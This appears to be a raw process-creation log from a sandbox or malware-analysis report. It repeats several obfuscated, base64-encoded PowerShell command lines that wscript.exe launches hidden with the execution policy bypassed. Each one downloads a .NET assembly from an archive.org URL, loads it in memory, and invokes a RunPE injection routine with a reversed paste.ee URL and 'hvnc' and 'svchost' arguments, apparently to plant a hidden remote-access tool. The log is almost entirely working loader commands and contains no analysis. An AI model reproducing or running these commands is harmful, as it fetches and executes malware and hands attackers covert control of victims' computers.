Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
